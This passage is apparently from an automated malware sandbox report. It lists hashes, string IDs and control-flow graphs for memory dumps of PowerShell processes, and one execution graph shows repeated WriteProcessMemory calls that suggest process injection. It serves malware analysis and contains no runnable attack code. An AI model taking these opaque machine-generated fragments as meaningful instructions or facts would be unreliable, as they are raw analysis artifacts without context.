                                                                                        • Instruction Fuzzy Hash: B8C11AB0B402149FDB10EB68C550BAEBBE6EF84308F558469E8015F359CB76DC46DBA2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tPjq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-2650090061
                                                                                        • Opcode ID: ee1a283dd809ea85f8295d8e6a561c03bcdaa349417d2de18eba911abcf33260
                                                                                        • Instruction ID: 434cec2fc79a2fcd5e02701adc3d429108a9f506b7a409f9d9b3582f8eeac07a
                                                                                        • Opcode Fuzzy Hash: ee1a283dd809ea85f8295d8e6a561c03bcdaa349417d2de18eba911abcf33260
                                                                                        • Instruction Fuzzy Hash: 3F212BF6A8022D8FCB24AE55D580A7677B9EF41614F24402AED009B359CB31DD51D7A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$tPjq$tPjq
                                                                                        • API String ID: 0-1557731583
                                                                                        • Opcode ID: cb11f8f79623ab8ec19ff46487f582d49a2669257d2599783ba9223de0851a57
                                                                                        • Instruction ID: 768fd535fe19746440f4a2e7aa675ab34184faacefd2a07ba6a6267385754d5d
                                                                                        • Opcode Fuzzy Hash: cb11f8f79623ab8ec19ff46487f582d49a2669257d2599783ba9223de0851a57
                                                                                        • Instruction Fuzzy Hash: B061F6B0740225DFCB14AF6D8810B7A7BDABF84318F148869D8059B398DA75CC42DBA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_7920000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$$jq$$jq
                                                                                        • API String ID: 0-1496060811
                                                                                        • Opcode ID: e29c86ae9964785441dab351c1c504c91b071ab693427fe200890709dda4de05
                                                                                        • Instruction ID: fc765992ae122d54059864037a17554961f3561f3061aa92859dd8aa00b8f672
                                                                                        • Opcode Fuzzy Hash: e29c86ae9964785441dab351c1c504c91b071ab693427fe200890709dda4de05
                                                                                        • Instruction Fuzzy Hash: 71F07D707852294FC729561858203A67BB7EFC2514B68056FC405DF38ACA248D47C393

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:27
                                                                                        Total number of Limit Nodes:3
                                                                                        execution_graph 52768 6f55580 52769 6f55598 52768->52769 52770 6f556a3 52769->52770 52777 b929a8 52769->52777 52782 b929a7 52769->52782 52787 b92a35 52769->52787 52792 b92ee0 52769->52792 52796 b92caf 52769->52796 52800 b92dbc 52769->52800 52778 b929e0 52777->52778 52779 b92a54 52778->52779 52780 b92e79 WriteProcessMemory 52778->52780 52779->52770 52781 b92eb4 52780->52781 52781->52770 52786 b929e0 52782->52786 52783 b92e79 WriteProcessMemory 52785 b92eb4 52783->52785 52784 b92a54 52784->52770 52785->52770 52786->52783 52786->52784 52791 b92a34 52787->52791 52788 b92e79 WriteProcessMemory 52790 b92eb4 52788->52790 52789 b92a54 52789->52770 52790->52770 52791->52788 52791->52789 52793 b92e18 WriteProcessMemory 52792->52793 52795 b92eb4 52793->52795 52795->52770 52797 b92c0d WriteProcessMemory 52796->52797 52799 b92eb4 52797->52799 52799->52770 52801 b92d16 WriteProcessMemory 52800->52801 52803 b92eb4 52801->52803 52803->52770

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2835 81e7341-81e7378 2837 81e737f-81e73b0 2835->2837 2838 81e737a 2835->2838 2841 81e73b3-81e73b9 2837->2841 2838->2837 2842 81e73bb 2841->2842 2843 81e73c2-81e73c3 2841->2843 2842->2843 2844 81e745e-81e749c 2842->2844 2845 81e763e-81e764f 2842->2845 2846 81e75b6-81e75d8 2842->2846 2847 81e7654 2842->2847 2848 81e7430-81e7450 2842->2848 2849 81e7531-81e7558 2842->2849 2850 81e74f1-81e7505 2842->2850 2851 81e7651-81e7652 2842->2851 2852 81e73c8-81e740d 2842->2852 2853 81e7567-81e7581 2842->2853 2854 81e7507-81e7527 2842->2854 2855 81e75e4 2842->2855 2856 81e76a3-81e76ab 2842->2856 2857 81e7663-81e7690 2842->2857 2843->2856 2887 81e749e-81e74a4 2844->2887 2888 81e74a6-81e74ab 2844->2888 2873 81e762c-81e7632 2845->2873 2878 81e75a4-81e75aa 2846->2878 2879 81e75da-81e75e2 2846->2879 2847->2857 2858 81e74df-81e74e5 2849->2858 2876 81e755a-81e7562 2849->2876 2850->2858 2851->2847 2852->2848 2886 81e740f-81e7426 2852->2886 2853->2855 2869 81e7583-81e759a 2853->2869 2854->2858 2859 81e7529-81e752f 2854->2859 2855->2873 2866 81e76b1-81e76d7 2856->2866 2857->2841 2874 81e7696-81e769e 2857->2874 2862 81e74ee-81e74ef 2858->2862 2863 81e74e7 2858->2863 2859->2858 2862->2853 2863->2845 2863->2846 2863->2847 2863->2849 2863->2850 2863->2851 2863->2853 2863->2854 2863->2855 2863->2862 2866->2841 2875 81e76dd-81e76e5 2866->2875 2877 81e759c-81e75a2 2869->2877 2869->2878 2880 81e763b-81e763c 2873->2880 2881 81e7634 2873->2881 2874->2841 2875->2841 2876->2858 2877->2878 2883 81e75ac 2878->2883 2884 81e75b3-81e75b4 2878->2884 2879->2878 2880->2845 2881->2845 2881->2847 2881->2851 2881->2880 2883->2845 2883->2846 2883->2847 2883->2851 2883->2855 2883->2884 2884->2846 2886->2841 2889 81e7428-81e742e 2886->2889 2887->2888 2890 81e74ad-81e74ae 2888->2890 2891 81e74b0-81e74dd 2888->2891 2889->2841 2890->2891 2891->2858
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :oh$Tejq
                                                                                        • API String ID: 0-1221594770
                                                                                        • Opcode ID: f3af284379ebc3a626c42022a257e31238c5307a37c4b5537b63a4f9293b68d0
                                                                                        • Instruction ID: 8fb51cdf84b88aed264335401e46d9e99c11660a629b725527ee390acb171ec8
                                                                                        • Opcode Fuzzy Hash: f3af284379ebc3a626c42022a257e31238c5307a37c4b5537b63a4f9293b68d0
                                                                                        • Instruction Fuzzy Hash: D0A10270E05608CFEB24CFAAD584BADBBF2EF89305F1084A9E419A72A1D7705985CF40

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2894 81e7350-81e7378 2895 81e737f-81e73b0 2894->2895 2896 81e737a 2894->2896 2899 81e73b3-81e73b9 2895->2899 2896->2895 2900 81e73bb 2899->2900 2901 81e73c2-81e73c3 2899->2901 2900->2901 2902 81e745e-81e749c 2900->2902 2903 81e763e-81e764f 2900->2903 2904 81e75b6-81e75d8 2900->2904 2905 81e7654 2900->2905 2906 81e7430-81e7450 2900->2906 2907 81e7531-81e7558 2900->2907 2908 81e74f1-81e7505 2900->2908 2909 81e7651-81e7652 2900->2909 2910 81e73c8-81e740d 2900->2910 2911 81e7567-81e7581 2900->2911 2912 81e7507-81e7527 2900->2912 2913 81e75e4 2900->2913 2914 81e76a3-81e76ab 2900->2914 2915 81e7663-81e7690 2900->2915 2901->2914 2945 81e749e-81e74a4 2902->2945 2946 81e74a6-81e74ab 2902->2946 2931 81e762c-81e7632 2903->2931 2936 81e75a4-81e75aa 2904->2936 2937 81e75da-81e75e2 2904->2937 2905->2915 2916 81e74df-81e74e5 2907->2916 2934 81e755a-81e7562 2907->2934 2908->2916 2909->2905 2910->2906 2944 81e740f-81e7426 2910->2944 2911->2913 2927 81e7583-81e759a 2911->2927 2912->2916 2917 81e7529-81e752f 2912->2917 2913->2931 2924 81e76b1-81e76d7 2914->2924 2915->2899 2932 81e7696-81e769e 2915->2932 2920 81e74ee-81e74ef 2916->2920 2921 81e74e7 2916->2921 2917->2916 2920->2911 2921->2903 2921->2904 2921->2905 2921->2907 2921->2908 2921->2909 2921->2911 2921->2912 2921->2913 2921->2920 2924->2899 2933 81e76dd-81e76e5 2924->2933 2935 81e759c-81e75a2 2927->2935 2927->2936 2938 81e763b-81e763c 2931->2938 2939 81e7634 2931->2939 2932->2899 2933->2899 2934->2916 2935->2936 2941 81e75ac 2936->2941 2942 81e75b3-81e75b4 2936->2942 2937->2936 2938->2903 2939->2903 2939->2905 2939->2909 2939->2938 2941->2903 2941->2904 2941->2905 2941->2909 2941->2913 2941->2942 2942->2904 2944->2899 2947 81e7428-81e742e 2944->2947 2945->2946 2948 81e74ad-81e74ae 2946->2948 2949 81e74b0-81e74dd 2946->2949 2947->2899 2948->2949 2949->2916
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :oh$Tejq
                                                                                        • API String ID: 0-1221594770
                                                                                        • Opcode ID: ffe3b1531cf8405c9d83eaa51ae7eafde200e08abf4c1fd85d159f3b57ef5e61
                                                                                        • Instruction ID: caa1d1647ca70e09825fb880ee7280e62b1d9229bebe23881cc0c8fdee306101
                                                                                        • Opcode Fuzzy Hash: ffe3b1531cf8405c9d83eaa51ae7eafde200e08abf4c1fd85d159f3b57ef5e61
                                                                                        • Instruction Fuzzy Hash: 04A1F370E05618CFEB64CFA9D584BADBBF2FF49305F1084AAE409A72A1D7705981CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4660000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Dn^
                                                                                        • API String ID: 0-4286564052
                                                                                        • Opcode ID: 89d34d868759ae6e94cd27722d6865cc12d1baabe858b76d6878caecd2a65d4a
                                                                                        • Instruction ID: 658d9c719f234ece2768f3a082152bd8c8a7f43d56fb5a35818da2d79e325cca
                                                                                        • Opcode Fuzzy Hash: 89d34d868759ae6e94cd27722d6865cc12d1baabe858b76d6878caecd2a65d4a
                                                                                        • Instruction Fuzzy Hash: 4BC28C70A05258DFCB01CFA8D594A9DBBB1FF49310F29819AE845EB362D734ED46CB90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 4054 466cfc0-466cfe8 4055 466d04e 4054->4055 4056 466cfea-466d010 4054->4056 4057 466d053-466d058 4055->4057 4061 466d017 4056->4061 4062 466d012-466d015 4056->4062 4059 466d04c-466d04d 4057->4059 4060 466d05a-466d060 4057->4060 4060->4057 4063 466d062-466d09a 4060->4063 4064 466d019-466d02a 4061->4064 4062->4064 4065 466d0e0 4063->4065 4066 466d09c-466d0a3 4063->4066 4076 466d02f-466d04b 4064->4076 4067 466d0e3-466d11f 4065->4067 4068 466d0b4 4066->4068 4069 466d0a5-466d0b2 4066->4069 4079 466d195-466d1a0 4067->4079 4080 466d121-466d12a 4067->4080 4071 466d0b6-466d0b8 4068->4071 4069->4071 4074 466d0bf-466d0c1 4071->4074 4075 466d0ba-466d0bd 4071->4075 4077 466d0d2 4074->4077 4078 466d0c3-466d0d0 4074->4078 4081 466d0de 4075->4081 4076->4059 4083 466d0d4-466d0d6 4077->4083 4078->4083 4084 466d1a2-466d1a5 4079->4084 4085 466d1af-466d1d1 4079->4085 4080->4079 4086 466d12c-466d132 4080->4086 4081->4067 4083->4081 4084->4085 4094 466d1d7-466d1e0 4085->4094 4095 466d28c-466d304 4085->4095 4088 466d38c-466d3b9 4086->4088 4089 466d138-466d145 4086->4089 4115 466d3ed-466d3f2 4088->4115 4116 466d3bb-466d3d9 4088->4116 4091 466d147-466d16b 4089->4091 4092 466d18c-466d193 4089->4092 4103 466d16d-466d170 4091->4103 4104 466d188 4091->4104 4092->4079 4092->4086 4094->4088 4096 466d1e6-466d215 4094->4096 4138 466d306-466d31c 4095->4138 4139 466d31e-466d331 4095->4139 4110 466d217-466d22d 4096->4110 4111 466d22f-466d242 4096->4111 4108 466d172-466d175 4103->4108 4109 466d17c-466d185 4103->4109 4104->4092 4108->4109 4113 466d244-466d24b 4110->4113 4111->4113 4119 466d270 4113->4119 4120 466d24d-466d25e 4113->4120 4117 466d3f4-466d410 4115->4117 4118 466d45c-466d4b9 4115->4118 4117->4118 4122 466d51f-466d541 4118->4122 4123 466d4bb-466d51d 4118->4123 4119->4095 4120->4119 4129 466d260-466d269 4120->4129 4125 466d573-466d588 4122->4125 4123->4122 4130 466d570 4125->4130 4131 466d58a-466d5b1 4125->4131 4129->4119 4130->4125 4132 466d5e3-466d5f8 4131->4132 4133 466d5b3-466d5de 4131->4133 4133->4132 4140 466d333-466d33a 4138->4140 4139->4140 4141 466d33c-466d342 4140->4141 4142 466d349 4140->4142 4141->4142 4142->4088
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4660000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1Dn^
                                                                                        • API String ID: 0-1777164062
                                                                                        • Opcode ID: da19c2aa5b80e3dd448eabfdc4791d9e4db6338124f0ac7fb305c1487261c2c6
                                                                                        • Instruction ID: 8f9edc9f8f44590457d7db26f2264bc59d0504da02b80a411ef5728ceab26f06
                                                                                        • Opcode Fuzzy Hash: da19c2aa5b80e3dd448eabfdc4791d9e4db6338124f0ac7fb305c1487261c2c6
                                                                                        • Instruction Fuzzy Hash: 68129D71A093849FDB02CF68D890ADDBFB1EF46314F198096D481EB363E635AD46CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_4650000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d981b1960966e474ac821f3c56f3a9e7d8c57caa5b708deebfa2169a87e9ae37
                                                                                        • Instruction ID: a2f891a73925063c6e32bb7fe101c3f403e4eea5ac98142c0fd8a373ae21f887
                                                                                        • Opcode Fuzzy Hash: d981b1960966e474ac821f3c56f3a9e7d8c57caa5b708deebfa2169a87e9ae37
                                                                                        • Instruction Fuzzy Hash: 2E52A2B4A006288FCB65DF28CD84B9ABBB6FB49301F1085D9D90DA7355DB34AE81CF51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.sh$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-110894578
                                                                                        • Opcode ID: 5748e5bb10cc5d49e32cc0d00a4790b2d3e16ad7f3e8e40329475f55452c91b6
                                                                                        • Instruction ID: 23f6f6e9ec7f59c8e97d41a92bb266d4ad89f742fc02a0aee3f83245884742c0
                                                                                        • Opcode Fuzzy Hash: 5748e5bb10cc5d49e32cc0d00a4790b2d3e16ad7f3e8e40329475f55452c91b6
                                                                                        • Instruction Fuzzy Hash: 32B2E2B0B0024ADFDB14CF68E954AAABBA6FF85310F24C46BD8059B355DB31DC46CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                                        • API String ID: 0-3414792074
                                                                                        • Opcode ID: 01fc6dc0a999f76d68cc66e93a12ba04e67f9b4f645f0e05de308fce582739a0
                                                                                        • Instruction ID: 684b77f6539d9af8c3cefa5fc92eb7c90b365339b74ef17dbfb655a0ab6d1f6c
                                                                                        • Opcode Fuzzy Hash: 01fc6dc0a999f76d68cc66e93a12ba04e67f9b4f645f0e05de308fce582739a0
                                                                                        • Instruction Fuzzy Hash: 65722BB4A00214CFDB14CB68C954BA9BBB2FF85314F54C0AAD9099B356CB32ED85CF91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.sh$-sh
                                                                                        • API String ID: 0-3562440148
                                                                                        • Opcode ID: aebe72d8bde837cff6ff1fb0fb5edf5f342b556110cb05b99cdc69cb4fd33630
                                                                                        • Instruction ID: 148a649aff0df160991dbfd9d7f189704ea1d373d6f9e5ca865a4603414ff9b6
                                                                                        • Opcode Fuzzy Hash: aebe72d8bde837cff6ff1fb0fb5edf5f342b556110cb05b99cdc69cb4fd33630
                                                                                        • Instruction Fuzzy Hash: 6B72A2B4B002158FDB14CB58D950BAEBBB6FF85300F54C4AAD809AB355DB31ED85CBA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1203 7571f20-7571f30 1204 7571f32-7571f3e 1203->1204 1205 7571f40 1203->1205 1206 7571f42-7571f44 1204->1206 1205->1206 1207 7571f46-7571f51 1206->1207 1208 7571fbf-7571fc9 1206->1208 1211 7571f53-7571f59 1207->1211 1212 7571f6f 1207->1212 1209 7571fd5-7571fdb 1208->1209 1210 7571fcb-7571fd2 1208->1210 1215 7571fe1-7571fed 1209->1215 1216 7571fdd-7571fdf 1209->1216 1213 7571f5f-7571f6b 1211->1213 1214 7571f5b-7571f5d 1211->1214 1217 7571f71-7571f7d 1212->1217 1218 7571f6d 1213->1218 1214->1218 1219 7571fef-757200b 1215->1219 1216->1219 1217->1208 1224 7571f7f-7571f86 1217->1224 1218->1217 1225 757200e-757204b 1224->1225 1226 7571f88-7571f91 1224->1226 1236 7572065-757206c 1225->1236 1237 757204d-7572053 1225->1237 1228 7571f93-7571f99 1226->1228 1229 7571fa9-7571fb2 1226->1229 1231 7571f9d-7571fa7 1228->1231 1232 7571f9b 1228->1232 1233 7571fb7-7571fbc 1229->1233 1231->1229 1232->1229 1238 7572084-7572085 1236->1238 1239 757206e-7572074 1236->1239 1240 7572057-7572063 1237->1240 1241 7572055 1237->1241 1242 7572076 1239->1242 1243 7572078-757207a 1239->1243 1240->1236 1241->1236 1242->1238 1243->1238
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$<,vh$$jq$$jq$$jq
                                                                                        • API String ID: 0-1690700719
                                                                                        • Opcode ID: 93c376497a6db3a3d3b40944f623f53e53525e01d063dd637168234bee5c859b
                                                                                        • Instruction ID: 28804df08d3a4ca1b31c60b1c28fd67194942e20beaa982f5a3425cfe4fff1a9
                                                                                        • Opcode Fuzzy Hash: 93c376497a6db3a3d3b40944f623f53e53525e01d063dd637168234bee5c859b
                                                                                        • Instruction Fuzzy Hash: 6641287170821A8FD7258A69F8105B6BBA6FFC6311F24846BEA45CB391DB35CC06C7B1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1488 7570488-75704a8 1490 75704ae-75704b6 1488->1490 1491 75704aa-75704ab 1488->1491 1492 75704ce-75704d2 1490->1492 1493 75704b8-75704be 1490->1493 1494 7570650-75706a5 1491->1494 1495 75704ac 1491->1495 1498 75705fd-7570607 1492->1498 1499 75704d8-75704da 1492->1499 1496 75704c2-75704cc 1493->1496 1497 75704c0 1493->1497 1495->1490 1496->1492 1497->1492 1503 7570615-757061b 1498->1503 1504 7570609-7570612 1498->1504 1500 75704dc-75704e8 1499->1500 1501 75704ea 1499->1501 1507 75704ec-75704ee 1500->1507 1501->1507 1505 7570621-757062d 1503->1505 1506 757061d-757061f 1503->1506 1510 757062f-757064d 1505->1510 1506->1510 1507->1498 1511 75704f4-7570513 1507->1511 1519 7570515-7570530 1511->1519 1520 7570532 1511->1520 1521 7570534-7570536 1519->1521 1520->1521 1521->1498 1522 757053c-7570540 1521->1522 1522->1498 1524 7570546-7570565 1522->1524 1528 7570567-757056d 1524->1528 1529 757057d-7570582 1524->1529 1530 7570571-7570573 1528->1530 1531 757056f 1528->1531 1532 7570589-757058b 1529->1532 1530->1529 1531->1529 1533 75705a3-75705fa 1532->1533 1534 757058d-7570593 1532->1534 1535 7570597-7570599 1534->1535 1536 7570595 1534->1536 1535->1533 1536->1533
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq$xi$xi
                                                                                        • API String ID: 0-1405679291
                                                                                        • Opcode ID: 79443788d104a2a050fb7910c74586ac4dbda38044c7812e6d249a8adab4d994
                                                                                        • Instruction ID: 0ad34b71591084b3f841e395de7ed8d459b7210d15d817b855206f334efc5297
                                                                                        • Opcode Fuzzy Hash: 79443788d104a2a050fb7910c74586ac4dbda38044c7812e6d249a8adab4d994
                                                                                        • Instruction Fuzzy Hash: 095128B0B042058FCB159A74A8207BEBBE6BFC6214F94846BD449CB2D1DB35D945C7B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$h2uh$x.sh
                                                                                        • API String ID: 0-2205546800
                                                                                        • Opcode ID: 1b91c8db4f45e5537b2826f968b95fded020cd4c2524da1cda0c94200808b8b4
                                                                                        • Instruction ID: 2996e96415d0af89a6fd999524fa6a8018c047fc369177055566ad8756f80f1e
                                                                                        • Opcode Fuzzy Hash: 1b91c8db4f45e5537b2826f968b95fded020cd4c2524da1cda0c94200808b8b4
                                                                                        • Instruction Fuzzy Hash: A51259B4B01255DFDB14CF58D584EAABBB2BF85304F54C46AE809AB355CB32EC42CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$x.sh
                                                                                        • API String ID: 0-1723697906
                                                                                        • Opcode ID: eb24dad0d19ab57e7346c35bc2bf15f8321c772725daca056bbb81bb684dfe88
                                                                                        • Instruction ID: f86d9c0546b3bcac17df5587b0555fa6453072f0ba9e790a0db1a48e27f371a3
                                                                                        • Opcode Fuzzy Hash: eb24dad0d19ab57e7346c35bc2bf15f8321c772725daca056bbb81bb684dfe88
                                                                                        • Instruction Fuzzy Hash: B4124BB4A01295DFDB14CF58D584EA9BBB2FF89304F14C46AE8196B355CB32EC42CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3271 7571bc8-7571bda 3273 7571be0-7571bf1 3271->3273 3274 7571c9a-7571d14 3271->3274 3278 7571bf3-7571bf9 3273->3278 3279 7571c0b-7571c28 3273->3279 3293 7571d16-7571d24 3274->3293 3294 7571d40-7571d45 3274->3294 3280 7571bfd-7571c09 3278->3280 3281 7571bfb 3278->3281 3279->3274 3285 7571c2a-7571c4c 3279->3285 3280->3279 3281->3279 3288 7571c66-7571c7e 3285->3288 3289 7571c4e-7571c54 3285->3289 3296 7571c80-7571c82 3288->3296 3297 7571c8c-7571c97 3288->3297 3291 7571c56 3289->3291 3292 7571c58-7571c64 3289->3292 3291->3288 3292->3288 3301 7571d2b-7571d3a 3293->3301 3294->3293 3296->3297 3301->3294
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7570000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tPjq$tPjq
                                                                                        • API String ID: 0-4117293638
                                                                                        • Opcode ID: 045c493ff7aaf112e7eb7a5a5ce38b5c68e502e5a34f3827bb83474f90b1bfd2
                                                                                        • Instruction ID: 0d8186ecf71fe2f5548fe022d537c71b9a8a8ae9e1a5f8616671553d11ce8ac0
                                                                                        • Opcode Fuzzy Hash: 045c493ff7aaf112e7eb7a5a5ce38b5c68e502e5a34f3827bb83474f90b1bfd2
                                                                                        • Instruction Fuzzy Hash: 8A4188B0B443585FCB208BA88C50BAABBE6EF85714F58845BE945AF3C1CA71DC41C7E1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3868 6f557e3-6f557e8 3869 6f557ee-6f557f6 3868->3869 3870 6f557ea-6f557ec 3868->3870 3871 6f5580e-6f55812 3869->3871 3872 6f557f8-6f557fe 3869->3872 3870->3869 3873 6f558e9-6f558f3 3871->3873 3874 6f55818-6f5581a 3871->3874 3875 6f55800 3872->3875 3876 6f55802-6f5580c 3872->3876 3878 6f558f5-6f558fe 3873->3878 3879 6f55901-6f55907 3873->3879 3874->3873 3877 6f55820-6f55824 3874->3877 3875->3871 3876->3871 3881 6f55844 3877->3881 3882 6f55826-6f55842 3877->3882 3883 6f5590d-6f55919 3879->3883 3884 6f55909-6f5590b 3879->3884 3885 6f55846-6f55848 3881->3885 3882->3885 3886 6f5591b-6f55939 3883->3886 3884->3886 3885->3873 3888 6f5584e-6f55857 3885->3888 3888->3873 3894 6f5585d-6f55870 3888->3894 3896 6f55875-6f55877 3894->3896 3897 6f5588f-6f558e6 3896->3897 3898 6f55879-6f5587f 3896->3898 3899 6f55881 3898->3899 3900 6f55883-6f55885 3898->3900 3899->3897 3900->3897
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'jq$4'jq
                                                                                        • API String ID: 0-1204115232
                                                                                        • Opcode ID: f2f2e54f3cfe283a5f75e27b40df199835d463b42f80fa2d57d17382055a2d67
                                                                                        • Instruction ID: b1f39bc34f635e4ab4bb9298167453a35fc83f47768b4b15e2051876f7e49872
                                                                                        • Opcode Fuzzy Hash: f2f2e54f3cfe283a5f75e27b40df199835d463b42f80fa2d57d17382055a2d67
                                                                                        • Instruction Fuzzy Hash: 29318B32F18214CFDF549A74D45027ABBA2EFC1222B2584AFCE468B2A4DB35CC45C792

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
